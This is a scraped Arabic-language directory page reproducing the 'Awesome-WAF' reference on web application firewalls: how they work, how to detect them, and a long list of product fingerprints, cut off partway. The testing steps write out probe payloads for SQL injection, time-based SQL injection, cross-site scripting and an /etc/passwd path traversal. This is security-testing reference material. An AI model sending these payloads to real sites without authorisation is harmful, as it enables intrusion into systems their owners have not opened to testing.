Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Awesome-WAF — كل ما يتعلق بجدران الحماية لتطبيقات الويب (WAFs) من منظور الأمان! 🔥 | Kitploit
أدوات/GitHubGitHub/0xinfection/awesome-waf
تجاوز WAFأمن الويبالتعلم والتعليمموارد منسقة
GitHub0xinfection/awesome-waf

Awesome-WAF

كل ما يتعلق بجدران الحماية لتطبيقات الويب (WAFs) من منظور الأمان! 🔥

عرض المستودع
7.6k1.2kمنذ 4 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Awesome WAF Awesome

كل شيء عن جدران الحماية لتطبيقات الويب (WAFs) من منظور أمني. 🔥

مقدمة: كانت هذه في الأصل مجموعتي الشخصية حول جدران الحماية لتطبيقات الويب. أقوم بنشرها كمصدر مفتوح على أمل أن تكون مفيدة للمختبرين الأمنيين والباحثين. وكما يقول المثل: "المجتمع يتعلم من بعضه البعض."

Main Logo

تعريف موجز: جدار الحماية هو نقطة إنفاذ لسياسة أمنية توضع بين تطبيق الويب ونقطة النهاية الخاصة بالعميل. يمكن تنفيذ هذه الوظيفة عبر برمجيات أو أجهزة، تعمل في جهاز مخصص أو في خادم نموذجي يعمل بنظام تشغيل عادي. قد يكون جهازًا قائمًا بذاته أو مدمجًا في مكونات شبكة أخرى. (المصدر: PCI DSS IS 6.6)

جدار حماية تطبيقات الويب يجلس بين المستخدم وتطبيق الويب، ومهمته منع أي نشاط ضار من الوصول إلى التطبيق. يقوم جدار الحماية إما بتصفية الجزء الضار من الطلب أو ببساطة حظره بالكامل.

لا تتردد في المساهمة.

المحتويات:

  • مقدمة
    • كيف تعمل جدران الحماية لتطبيقات الويب
    • أنماط التشغيل
  • منهجية الاختبار
    • أين تبحث
    • تقنيات الكشف
  • بصمات جدران الحماية لتطبيقات الويب
  • تقنيات التجاوز
    • التجربة العشوائية/القوة الغاشمة
    • عكس التعبيرات النمطية
    • الإخفاء/الترميز
    • ثغرات المتصفحات
    • تزوير رؤوس HTTP
    • أسلوب استعلامات Google
  • التجاوزات المعروفة
  • أدوات رائعة
    • التعرف على البصمات
    • الاختبار
    • التجاوز
  • المدونات والكتابات
  • العروض المرئية
  • العروض التقديمية والأبحاث
    • الأوراق البحثية
    • شرائح العروض التقديمية
  • الترخيص والإسنادات

مقدمة:

كيف تعمل جدران الحماية لتطبيقات الويب:

  • باستخدام مجموعة من القواعد للتمييز بين الطلبات العادية والطلبات الضارة.
  • أحيانًا تستخدم وضع التعلم لإضافة قواعد تلقائيًا من خلال التعلم من سلوك المستخدم.

أنماط التشغيل:

  • النموذج السلبي (قائم على القائمة السوداء) - يستخدم نموذج القائمة السوداء توقيعات محددة مسبقًا لحظر الطلبات التي تكون ضارة بوضوح. يتم تصميم توقيعات جدران الحماية التي تعمل بالنموذج السلبي خصيصًا لمنع الهجمات التي تستغل ثغرات معينة في تطبيقات الويب. جدران الحماية بتطبيقات الويب القائمة على القائمة السوداء هي خيار ممتاز لتطبيقات الويب المعرضة للإنترنت العام، وهي فعالة جدًا ضد الثغرات الرئيسية. مثال: قاعدة لمنع جميع إدخالات <script>*</script> تمنع هجمات البرمجة النصية عبر المواقع الأساسية.
  • النموذج الإيجابي (قائم على القائمة البيضاء) - يسمح نموذج القائمة البيضاء فقط بمرور حركة مرور الويب وفقًا لمعايير محددة خصيصًا. على سبيل المثال، يمكن ضبطه للسماح فقط بطلبات HTTP GET من عناوين IP معينة. يمكن أن يكون هذا النموذج فعالاً جدًا في منع هجمات واسعة النطاق محتملة، ولكنه سيحجب أيضًا الكثير من حركة المرور المشروعة. جدران الحماية بنموذج القائمة البيضاء ربما تكون الأفضل لتطبيقات الويب على الشبكة الداخلية المصممة لاستخدامها من قبل مجموعة محدودة فقط من الأشخاص، مثل الموظفين.
  • النموذج المختلط/الهجين (النموذج الشامل) - يجمع النموذج الأمني الهجين بين القائمة البيضاء والقائمة السوداء. اعتمادًا على جميع أنواع التفاصيل الخاصة بالتكوين، يمكن أن تكون جدران الحماية الهجينة الخيار الأفضل لكل من تطبيقات الويب على الشبكات الداخلية وتطبيقات الويب على الإنترنت العام. حالة جيدة يمكن أن تكون عندما يكون تطبيق الويب مواجهًا للإنترنت العام (استخدام القوائم السوداء) بينما يجب أن تكون لوحة الإدارة متاحة فقط لمجموعة فرعية من المستخدمين (استخدام القوائم البيضاء).

منهجية الاختبار:

أين تبحث:

  • ابحث دائمًا عن المنافذ الشائعة التي تكشف وجود جدار حماية، وهي المنافذ 80، 443، 8000، 8080 و 8888. ومع ذلك، من المهم ملاحظة أنه يمكن نشر جدار الحماية بسهولة على أي منفذ يعمل بخدمة HTTP. من الجيد تعداد منافذ خدمة HTTP أولاً ثم البحث عن جدران الحماية.
  • بعض جدران الحماية تقوم بتعيين ملفات تعريف ارتباط خاصة بها في الطلبات (مثل Citrix Netscaler، Yunsuo WAF).
  • بعضها يرتبط برؤوس منفصلة (مثل Anquanbao WAF، Amazon AWS WAF).
  • البعض الآخر غالبًا ما يغير الرؤوس ويخلط الأحرف لإرباك المهاجم (مثل Netscaler، Big-IP).
  • بعضها يكشف عن نفسه في رأس Server (مثل Approach، WTS WAF).
  • بعض جدران الحماية تكشف عن نفسها في محتوى الاستجابة (مثل DotDefender، Armor، Sitelock).
  • جدران حماية أخرى ترد برموز استجابة غير عادية عند الطلبات الضارة (مثل WebKnight، 360 WAF).

تقنيات الكشف:

لتحديد جدران الحماية، نحتاج إلى استفزازها (بطريقة تجريبية).

  1. قم بعمل طلب GET عادي من متصفح، اعترض وسجل رؤوس الاستجابة (خاصة ملفات تعريف الارتباط).
  2. قم بعمل طلب من سطر الأوامر (مثل cURL)، واختبر محتوى الاستجابة والرؤوس (بدون تضمين user-agent).
  3. قم بعمل طلبات GET إلى منافذ مفتوحة عشوائية واحصل على اللافتات التي قد تكشف هوية جدار الحماية.
  4. على صفحات تسجيل الدخول، قم بحقن حمولات شائعة (سهلة الكشف) مثل " or 1 = 1 --.
  5. قم بحقن حمولات صاخبة مثل <script>alert()</script> في أشرطة البحث، نماذج الاتصال، وحقول إدخال أخرى.
  6. ألحق ../../../etc/passwd وهمي بمعامل عشوائي في نهاية عنوان URL.
  7. أضف بعض الكلمات الجذابة مثل ' OR SLEEP(5) OR ' في نهاية عناوين URL لأي معامل عشوائي.
  8. قم بعمل طلبات GET ببروتوكولات قديمة مثل HTTP/0.9 (HTTP/0.9 لا يدعم استعلامات من نوع POST).
  9. في كثير من الأحيان، يغير جدار الحماية رأس Server بناءً على أنواع مختلفة من التفاعلات.
  10. تقنية إسقاط الإجراء - أرسل حزمة FIN/RST مصنعة خام إلى الخادم وحدد الاستجابة.

    نصيحة: يمكن تحقيق هذه الطريقة بسهولة باستخدام أدوات مثل HPing3 أو Scapy.

  11. الهجمات الجانبية - افحص سلوك التوقيت للطلب ومحتوى الاستجابة.

    نصيحة: يمكن العثور على مزيد من التفاصيل في مقالة هنا.

بصمات جدران الحماية لتطبيقات الويب

هل تريد التعرف على بصمات جدران الحماية؟ لنرى كيف.

ملاحظة: يحتوي هذا القسم على تقنيات كشف يدوية لجدران الحماية. قد ترغب في الانتقال إلى القسم التالي.





## تقنيات التهرب دعنا نلقي نظرة على بعض طرق تجاوز والتهرب من جدران الحماية لتطبيقات الويب (WAFs).
تنزيل الأداة
جدار الحمايةالبصمات
360
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يعيد رمز الحالة 493 عند الطلبات غير المعتادة.
    • قد تحتوي صفحة الحظر على مرجع إلى المسار wzws-waf-cgi/.
    • قد يحتوي مصدر صفحة الاستجابة المحظورة على:
      • مرجع إلى عنوان URL wangshan.360.cn.
      • نص Sorry! Your access has been intercepted because your links may threaten website security..
    • قد تحتوي ترويسات الاستجابة على الترويسة X-Powered-By-360WZB.
    • تحتوي ترويسات الاستجابة المحظورة على ترويسة فريدة WZWS-Ray.
    • قد تحتوي الترويسة Server على القيمة qianxin-waf.
aeSecure
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • يحتوي محتوى الاستجابة المحظورة على صورة aesecure_denied.png (انظر المصدر لرؤيتها).
    • تحتوي ترويسات الاستجابة على القيمة aeSecure-code.
Airlock
  • قابلية الكشف: متوسطة/صعبة
  • منهجية الكشف:
    • قد تحتوي ترويسات Set-Cookie على:
      • اسم حقل الكوكيز AL-SESS (غير حساس لحالة الأحرف).
      • القيمة AL-LB (غير حساسة لحالة الأحرف).
    • تحتوي صفحة الاستجابة المحظورة على:
      • النص Server detected a syntax error in your request.
      • النص Check your request and all parameters.
AlertLogic
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على:
      • النص We are sorry, but the page you are looking for cannot be found.
      • النص The page has either been removed, renamed or temporarily unavailable.
      • 404 Not Found بأحرف حمراء.
Aliyundun
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على:
      • النص Sorry, your request has been blocked as it may cause potential threats to the server's security.
      • مرجع إلى عنوان URL للموقع errors.aliyun.com.
    • رمز الاستجابة المحظورة المُعاد هو 405.
Anquanbao
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يعيد رمز استجابة HTTP محظور 405 عند الطلبات الضارة.
    • قد يحتوي محتوى الاستجابة المحظورة على /aqb_cc/error/ أو hidden_intercept_time.
    • تحتوي ترويسات الاستجابة على حقل الترويسة X-Powered-by-Anquanbao.
Anyu
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي محتوى الاستجابة المحظورة على Sorry! your access has been intercepted by AnYu
    • تحتوي صفحة الاستجابة المحظورة على نص AnYu- the green channel.
    • قد تحتوي ترويسات الاستجابة على ترويسة غير معتادة WZWS-RAY.
Approach
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد يحتوي محتوى صفحة الاستجابة المحظورة على:
      • عنوان Approach Web Application Firewall Framework.
      • تحذير Your IP address has been logged and this information could be used by authorities to track you..
      • كلمة مفتاحية Sorry for the inconvenience!.
      • نص Approach infrastructure team.
    • تحتوي الترويسة Server على قيمة الحقل Approach.
Armor Defense
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي محتوى الاستجابة المحظورة على:
      • النص This request has been blocked by website protection from Armor.
      • النص If you manage this domain please create an Armor support ticket.
ArvanCloud
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية ArvanCloud.
ASPA
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية ASPA-WAF.
    • يحتوي الاستجابة على ترويسة فريدة ASPA-Cache-Status بالمحتوى HIT أو MISS.
ASP.NET Generic
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد تحتوي ترويسات الاستجابة على قيمة الترويسة X-ASPNET-Version.
    • قد يحتوي محتوى صفحة الاستجابة المحظورة على:
      • This generic 403 error means that the authenticated user is not authorized to use the requested resource.
      • كلمة مفتاحية Error Code 0x00000000<.
    • تحتوي الترويسة X-Powered-By على قيمة الحقل ASP.NET.
Astra
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد يحتوي محتوى صفحة الاستجابة المحظورة على:
      • Sorry, this is not allowed. في h1.
      • نص our website protection system has detected an issue with your IP address and wont let you proceed any further.
      • مرجع إلى عنوان URL www.getastra.com/assets/images/.
    • تحتوي كوكيز الاستجابة على قيمة الحقل cz_astra_csrf_cookie في ترويسات الاستجابة.
AWS ELB
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد تحتوي ترويسات الاستجابة على:
      • قيمة حقل الكوكيز AWSALB.
      • الترويسة X-AMZ-ID.
      • الترويسة X-AMZ-REQUEST-ID.
    • قد تحتوي صفحة الاستجابة على:
      • Access Denied في كلمتها المفتاحية.
      • رمز طلب بطول من 20 إلى 25 بين وسم RequestId.
    • يحتوي حقل الترويسة Server على القيمة awselb/2.0.
Baidu Yunjiasu
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد تحتوي الترويسة Server على القيمة Yunjiasu-nginx.
    • قد تحتوي الترويسة Server على القيمة Yunjiasu.
Barikode
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي محتوى صفحة الاستجابة المحظورة على:
      • الكلمة المفتاحية BARIKODE.
      • نص Forbidden Access في h1.
Barracuda
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد تحتوي كوكيز الاستجابة على القيمة barra_counter_session.
    • قد تحتوي ترويسات الاستجابة على الكلمة المفتاحية barracuda_.
  • تحتوي صفحة الاستجابة على:
    • عنوان You have been blocked.
    • النص You are unable to access this website.
Bekchy
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة المحظورة على Bekchy - Access Denied.
    • تحتوي صفحة الاستجابة المحظورة على مرجع إلى https://bekchy.com/report.
BinarySec
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على:
      • حقل X-BinarySec-Via.
      • حقل X-BinarySec-NoCache.
      • تحتوي الترويسة Server على الكلمة المفتاحية BinarySec.
BitNinja
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد تحتوي صفحة الاستجابة المحظورة على:
      • نص Security check by BitNinja.
      • your IP will be removed from BitNinja.
      • نص Visitor anti-robot validation.
      • النص (You will be challenged by a reCAPTCHA page).
BIG-IP ASM
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد تحتوي ترويسات الاستجابة على القيمة المفتاحية BigIP أو F5.
    • قد تحتوي حقول ترويسة الاستجابة على الترويسة X-WA-Info.
    • قد تحتوي ترويسات الاستجابة على قيمة حقل مشوشة X-Cnection.
BlockDos
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي الترويسة Server على القيمة BlockDos.net.
Bluedon IST
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على قيمة الحقل BDWAF.
    • تحتوي صفحة الاستجابة المحظورة على نص Bluedon Web Application Firewall..
BulletProof Security Pro
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على:
      • نص div بالمعرف bpsMessage.
      • النص If you arrived here due to a search or clicking on a link click your Browser's back button to return to the previous page..
CDN NS Application Gateway
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على نص CdnNsWAF Application Gateway.
Cerber (WordPress)
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على:
      • النص We're sorry, you are not allowed to proceed.
      • تحذير Your request looks suspicious or similar to automated requests from spam posting software.
Chaitin Safeline
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على الكلمة المفتاحية event_id داخل تعليقات HTML.
ChinaCache
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على الحقل Powered-by-ChinaCache.
Cisco ACE XML Gateway
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي الترويسة Server على القيمة ACE XML Gateway.
Cloudbric
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • يحتوي محتوى الاستجابة على:
      • عنوان Malicious Code Detected.
      • نص Your request was blocked by Cloudbric.
      • مرجع إلى عنوان URL https://cloudbric.zendesk.com.
      • النص Cloudbric Help Center.
      • عنوان الصفحة يبدأ بـ Cloudbric | ERROR!.
Cloudflare
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد تحتوي ترويسات الاستجابة على قيمة الحقل cf-ray.
    • يحتوي حقل الترويسة Server على القيمة cloudflare.
    • تحتوي ترويسات الاستجابة Set-Cookie على حقل الكوكيز __cfuid=.
    • قد يحتوي محتوى الصفحة على Attention Required! أو Cloudflare Ray ID:.
    • قد يحتوي محتوى الصفحة على DDoS protection by Cloudflare كنص.
    • قد تواجه CLOUDFLARE_ERROR_500S_BOX عند النقر على روابط غير صالحة.
CloudfloorDNS
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي حقل الترويسة Server على القيمة CloudfloorDNS WAF.
    • قد يحتوي عنوان صفحة الحظر على CloudfloorDNS - Web Application Firewall Error.
    • قد يحتوي محتوى الصفحة على عنوان URL www.cloudfloordns.com/contact كرابط اتصال.
Cloudfront
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي محتوى الاستجابة المحظورة على خطأ Generated by cloudfront (CloudFront) عند الطلب الضار.
Comodo cWatch
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على القيمة Protected by COMODO WAF.
CrawlProtect
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد تحتوي كوكيز الاستجابة على اسم الكوكيز crawlprotect.
    • يحتوي عنوان صفحة الحظر على الكلمة المفتاحية CrawlProtect.
    • يحتوي محتوى الاستجابة المحظورة على القيمة
      This site is protected by CrawlProtect !!! عند الطلب الضار.
Deny-All
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • يحتوي محتوى الاستجابة على القيمة Condition Intercepted.
    • تحتوي الترويسة Set-Cookie على حقل الكوكيز sessioncookie.
Distil Web Protection
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على قيمة الحقل X-Distil-CS في جميع الطلبات.
    • تحتوي صفحة الاستجابة المحظورة على:
      • عنوان Pardon Our Interruption....
      • نص You have disabled javascript in your browser..
      • النص Something about your browser made us think that you are a bot..
DoSArrest Internet Security
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على قيمة الحقل X-DIS-Request-ID.
    • تحتوي الترويسة Server على الكلمة المفتاحية DOSarrest.
DotDefender
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي محتوى الاستجابة المحظورة على القيمة
      dotDefender Blocked Your Request.
    • تحتوي ترويسات الاستجابة المحظورة على قيمة الحقل X-dotDefender-denied.
DynamicWeb Injection Check
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة المحظورة على الحقل X-403-Status-By بالقيمة dw-inj-check.
e3Learning Security
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية e3Learning_WAF.
EdgeCast (Verizon)
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي محتوى الاستجابة المحظورة على القيمة
      Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon).
    • يعيد رمز الاستجابة المحظورة 400 Bad Request على الطلبات الضارة.
Eisoo Cloud
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد يحتوي محتوى صفحة الاستجابة المحظورة على:
      • مرجع /eisoo-firewall-block.css.
      • عنوان URL www.eisoo.com.
      • كلمة مفتاحية © (year) Eisoo Inc..
    • تحتوي الترويسة Server على قيمة الحقل EisooWAF-AZURE/EisooWAF.
Expression Engine
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تعيد صفحة الاستجابة المحظورة بشكل عام Invalid URI.
    • يحتوي محتوى الاستجابة المحظورة على القيمة Invalid GET Request عند استعلامات GET الضارة.
    • تحتوي استعلامات POST المحظورة على Invalid Data في محتوى الاستجابة.
F5 ASM
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • يحتوي محتوى الاستجابة المحظورة على تحذير
      The requested URL was rejected. Please consult with your administrator.
FortiWeb
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على FORTIWAFSID= على الطلبات الضارة.
    • تحتوي صفحة الاستجابة المحظورة على:
      • مرجع إلى أيقونة الصورة .fgd_icon.
      • Server Unavailable! كعنوان.
      • Server unavailable. Please visit later. كنص.
GoDaddy
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على القيمة
      Access Denied - GoDaddy Website Firewall.
GreyWizard
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على:
      • Grey Wizard كعنوان.
      • نص Contact the website owner or Grey Wizard.
      • نص We've detected attempted attack or non standard traffic from your IP address.
    • تحتوي الترويسة Server على الكلمة المفتاحية greywizard.
Huawei Cloud
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على:
      • مرجع إلى صورة الخطأ account.hwclouds.com/static/error/images/404img.jpg.
      • مرجع إلى عنوان URL www.hwclouds.com.
      • مرجع إلى البريد الإلكتروني hws_security@{site.tld} للتبليغ.
HyperGuard
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي الترويسة Set-Cookie على حقل الكوكيز ODSESSION= في ترويسات الاستجابة.
IBM DataPower
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على قيمة الحقل X-Backside-Transport بالقيمة OK أو FAIL.
Imperva Incapsula
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد يحتوي محتوى صفحة الاستجابة المحظورة على:
      • نص Powered By Incapsula.
      • كلمة مفتاحية Incapsula incident ID.
      • كلمة مفتاحية _Incapsula_Resource.
      • كلمة مفتاحية subject=WAF Block Page.
    • تحتوي ترويسات طلب GET العادي على القيمة visid_incap.
    • قد تحتوي ترويسات الاستجابة على اسم حقل الترويسة X-Iinfo.
    • تحتوي الترويسة Set-Cookie على حقلي الكوكيز incap_ses و visid_incap.
Imunify360
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية imunify360-webshield.
    • تحتوي صفحة الاستجابة على:
      • نص Powered by Imunify360.
      • imunify360 preloader إذا كان نوع الاستجابة هو JSON.
    • تحتوي صفحة الاستجابة المحظورة على النص protected by Imunify360.
IndusGuard
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي الترويسة Server على القيمة IF_WAF.
    • يحتوي محتوى الاستجابة المحظورة على تحذير
      further investigation and remediation with a screenshot of this page.
    • تحتوي ترويسات الاستجابة على ترويسة فريدة X-Version.
Instart DX
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على ترويسة فريدة X-Instart-Request-ID.
    • تحتوي ترويسات الاستجابة على ترويسة فريدة X-Instart-WL.
    • تحتوي ترويسات الاستجابة على ترويسة فريدة X-Instart-Cache.
    • تحتوي صفحة الاستجابة المحظورة على النص The requested URL was rejected. Please consult with your administrator..
ISA Server
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على:
      • نص The ISA Server denied the specified Uniform Resource Locator (URL).
      • نص The server denied the specified Uniform Resource Locator (URL). Contact the server administrator.
Janusec Application Gateway
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على صورة تعرض اسم وشعار JANUSEC.
    • تعرض صفحة الاستجابة المحظورة Janusec Application Gateway على الطلبات الضارة.
Jiasule
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على مرجع إلى عنوان URL static.jiasule.com/static/js/http_error.js.
    • تحتوي الترويسة Set-Cookie على حقل الكوكيز _jsluid= أو jsl_tracking في ترويسات الاستجابة.
    • تحتوي الترويسة Server على الكلمات المفتاحية jiasule-WAF.
    • يحتوي محتوى الاستجابة المحظورة على الكلمة المفتاحية notice-jiasule.
KeyCDN
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية KeyCDN.
KnownSec
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تعرض صفحة الاستجابة المحظورة الصورة ks-waf-error.png (انظر المصدر لرؤيتها).
KONA Site Defender (Akamai)
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية AkamaiGHost.
LiteSpeed
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على القيمة LiteSpeed.
    • تحتوي صفحة الاستجابة على:
      • النص Proudly powered by LiteSpeed Web Server.
      • مرجع إلى http://www.litespeedtech.com/error-page
      • Access to resource on this server is denied.
Malcare
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد تحتوي صفحة الاستجابة المحظورة على:
      • نص Blocked because of Malicious Activities.
      • نص Firewall powered by MalCare.
MissionControl Application Shield
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي حقل الترويسة Server على القيمة Mission Control Application Shield.
ModSecurity
  • قابلية الكشف: متوسطة/صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على:
      • نص This error was generated by Mod_Security.
      • نص One or more things in your request were suspicious.
      • نص rules of the mod_security module.
      • نص mod_security rules triggered.
      • مرجع إلى المسار /modsecurity-errorpage/.
    • قد تحتوي الترويسة Server على الكلمات المفتاحية Mod_Security أو NYOB.
    • أحياناً، يكون رمز الاستجابة للهجوم هو 403 بينما عبارة الاستجابة هي ModSecurity Action.
ModSecurity CRS
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تظهر صفحة الحظر عند إضافة ترويسة طلب منفصلة X-Scanner عند تعيينها إلى مستوى بارانويا معين.
NAXSI
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على This Request Has Been Blocked By NAXSI.
    • تحتوي ترويسات الاستجابة على حقل غير معتاد X-Data-Origin بالقيمة المفتاحية naxsi/waf.
    • تحتوي الترويسة Server على القيمة المفتاحية naxsi/waf.
    • قد تحتوي صفحة الاستجابة المحظورة على رمز خطأ NAXSI blocked information.
Nemesida
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على Suspicious activity detected. Access to the site is blocked..
    • تحتوي على مرجع إلى البريد الإلكتروني nwaf@{site.tld}
Netcontinuum
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي كوكيز الجلسة على اسم حقل الكوكيز NCI__SessionId=.
NetScaler AppFirewall
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد تحتوي ترويسات الاستجابة على
      • اسم حقل الترويسة Connection: مشوش إلى nnCoection:
      • اسم حقل الكوكيز ns_af=.
      • اسم الحقل citrix_ns_id.
      • الكلمة المفتاحية NSC.
      • قيمة الحقل NS-CACHE.
NevisProxy
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي كوكيز ترويسة الاستجابة على الكلمة المفتاحية Navajo.
NewDefend
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على:
      • مرجع إلى عنوان URL http://www.newdefend.com/feedback/misinformation/.
      • مرجع إلى المسار /nd_block/.
    • تحتوي الترويسة Server على الكلمة المفتاحية NewDefend.
Nexusguard
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على مرجع إلى عنوان URL speresources.nexusguard.com/wafpage/index.html.
NinjaFirewall
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • يحتوي عنوان صفحة الاستجابة على NinjaFirewall: 403 Forbidden.
    • تحتوي صفحة الاستجابة على:
      • نص For security reasons, it was blocked and logged.
      • كلمة مفتاحية NinjaFirewall في العنوان.
    • تعيد استجابة 403 Forbidden عند الطلبات الضارة.
NSFocus
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية NSFocus.
NullDDoS
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية NullDDoS System.
onMessage Shield
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على حقل الترويسة X-Engine بالقيمة onMessage Shield.
    • تحتوي صفحة الاستجابة المحظورة على:
      • كلمة مفتاحية Blackbaud K-12 conducts routine maintenance.
      • This site is protected by an enhanced security system.
      • مرجع إلى عنوان URL https://status.blackbaud.com.
      • مرجع إلى عنوان URL https://maintenance.blackbaud.com.
OpenResty Lua WAF
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية openresty/{version}.
    • تحتوي صفحة الاستجابة المحظورة على النص openresty/{version}.
    • رمز الاستجابة المحظورة المُعاد هو 406 Not Acceptable.
Palo Alto
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على Virus/Spyware Download Blocked.
    • قد تحتوي صفحة الاستجابة على نص Palo Alto Next Generation Security Platform.
PentaWAF
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية PentaWAF/{version}.
    • تحتوي صفحة الاستجابة المحظورة على النص PentaWAF/{version}.
PerimeterX
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على مرجع إلى
      عنوان URL https://www.perimeterx.com/whywasiblocked.
pkSecurityModule IDS
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد يحتوي محتوى الاستجابة على
      • pkSecurityModule: Security.Alert.
